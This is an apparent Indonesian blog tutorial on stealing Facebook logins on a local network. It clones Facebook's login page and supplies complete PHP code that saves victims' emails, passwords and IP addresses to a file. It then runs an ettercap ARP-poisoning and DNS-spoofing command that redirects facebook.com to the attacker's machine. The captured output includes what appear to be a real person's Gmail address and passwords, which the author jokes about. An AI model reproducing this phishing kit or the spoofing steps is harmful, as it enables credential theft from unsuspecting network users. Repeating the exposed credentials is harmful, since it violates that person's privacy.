Hack Facebook dengan Phissing attack di kombinasikan dengan Spoofing Attack pada Backtrack

Phissing atau dikenal di kalangan umum sebagai fakelogin sebenarnya adalah suatu tehnik dalam man on the middle attack. Dengan memanfaatkan human error atau kelalaian internet user , maka phissing merupakan salah satu metode serangan yang tidak dapat di anggap enteng.

Phissing sendiri menurut saya merupakan aksi penipuan dengan memanfaatkan fakelogin atau halaman palsu dari suatu situs tertentu yang memiliki halaman login atau memerlukan autentifikasi user untuk menggunakan aplikasi web tersebut. Biasanya Phissher mengincar website-website jejaring social , email , dan situs internet banking. Tujuan para attacker tersebutnya sebenarnya hanya untuk mendapat username serta password dari pengguna situs-situs penting di atas yang di gunakan untuk kepentingan sendiri.

Ok ,langsung saja kali ini saya akan membuka tabir salah satu metode klasik phissing attack yang memang masih sangat work atau bisa di katakan masih berhasil di lakukan baik lewat metode NAT maupun LAN.

1. Menyiapkan fakelogin

Untuk contoh kali ini , saya akan menggunakan situs jejaring sosial paling populer saat artikel ini ditulis, saya memilih facebook.com sebagai target spoofing kali ini.

Untuk membuat fakelogin facebook , maka kita hanya tinggal membuka facebook.com kemudian kita save page indexnya dengan control kanan lalu pilih save as

Save dengan nama index.html dan save di direktori localhost atau webserver lokal anda. Karena saya menggunakan backtrack maka saya menyimpannya di direktori /var/www

Kemudian edit file index.html tadi dengan editor text anda kali ini saya gunakan gedit

Cari dengan fasilitas search ( cntrl+f ) kata action kemudian rubah isinya dengan “post.php”

action="https://www.facebook.com/login.php?login_attempt=1"

Rubah jadi

action="post.php"

Kemudian siapkan file post.php dengan source code di bawah ini , simpan dengan nama post.php dalam direktori yang sama dengan index.html.

<!--?php 
 $file = "zeeganteng.txt";

$username = $_POST['email'];

$password = $_POST['pass'];

$ip = $_SERVER['REMOTE_ADDR'];

$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');

fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");

fwrite($handle, "\n");

fwrite($handle, "Email: ");

fwrite($handle, "$username");

fwrite($handle, "\n");

fwrite($handle, "Password: ");

fwrite($handle, "$password");

fwrite($handle, "\n");

fwrite($handle, "IP Address: ");

fwrite($handle, "$ip");

fwrite($handle, "\n");

fwrite($handle, "Date Submitted: ");

fwrite($handle, "$today");

fwrite($handle, "\n");

fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");

fwrite($handle, "\n");

fwrite($handle, "\n");

fclose($handle);

echo "// ";

?>

Perhatikan nilai pada variable $file. Disanalah script tersebut akan menyimpan hasil input pada form login dan form password. karena itu kita harus membuat sebuah file kosong zeeganteng.txt kemudian simpan pada direktori yang sama.

Bagi pengguna linux , jangan lupa untuk mengatur chmod 777 ke seluruh file agar dapat di esekusi oleh “other”

zee@eichel{/var}:chown 777 www -R
 zee@eichel{/var}:ls -l www
 total 52
 drwxrwxrwx 3 777 527 4096 2012-01-06 21:23 ./
 drwxr-xr-x 18 root root 4096 2011-11-03 18:50 ../
 drwx------ 2 777 root 4096 2012-01-06 20:56 index_files/
 -rw-r--r-- 1 777 root 34008 2012-01-06 21:16 index.html
 -rw-r--r-- 1 777 root 0 2012-01-06 21:21 zeeganteng.txt
 -rw-r--r-- 1 777 root 911 2012-01-06 21:21 post.php

Saya melakukan testing .. ke http://127.0.0.1/

2. Spoofing Attack

Setelah kita berhasil membuat fakelogin tadi , saatnya kita melakukan serangan spoofing agar korban tidak harus menulis ip address kita untuk mencapai fakelogin yang telah kita persiapkan pada direktori localhost kita. Dalam kasus ini saya memiliki ip address 192.168.1.6 maka saya melakukan spoof attack dari domain facebook.com dan mengarah kepada ip address saya. Untuk melakukan itu silahkan teman-teman membaca artikel saya sebelumnya mengenai ettercap dan dns spoofing pada alamat di bawah ini.

http://zeestuff.wordpress.com/2012/01/06/ettercap-di-backtrack-v/

zee@eichel{/var}:ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //

Listening on wlan0… (Ethernet)

wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0

Privileges dropped to UID 0 GID 0…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %

9 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

Text only Interface activated…
Hit ‘h’ for inline help

Activating dns_spoof plugin…

dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [api-read.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-ie-w.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [pixel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-244.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [id-id.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [es-la.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [pt-br.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [fr-fr.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [de-de.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [it-it.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [ar-ar.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [hi-in.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
IMAP : 74.125.157.109:993 -> USER: cassa.prodigy@gmail.com PASS: m1rw4nju4n22091985
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [m.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [m.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [graph.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [api.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-244.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
IMAP : 173.194.66.109:993 -> USER: cassa.prodigy@gmail.com PASS: m0twhnju4n22ees1985
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
DHCP: [F4:EC:38:99:60:F3] REQUEST 192.168.1.6
DHCP: [192.168.1.1] ACK : 192.168.1.6 255.255.255.0 GW 192.168.1.1 DNS 8.8.8.8 “”
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]

Upz lagi spoofed om mirwan aka cassprodigy kena spoof kwwkkw.. maap2 om .. langsung ganti aja dah passwordnya

Kalau sudah pastinya jika korban membuka url facebook.com maka akan di redirect ke 192.168.1.6 dan menemukan login palsu kemudian akan memasukan user name berikut password..yang nantinya akan di rekam di file zeeganteng.txt

Ok sampai di sini dulu berhubung besok mau kuliah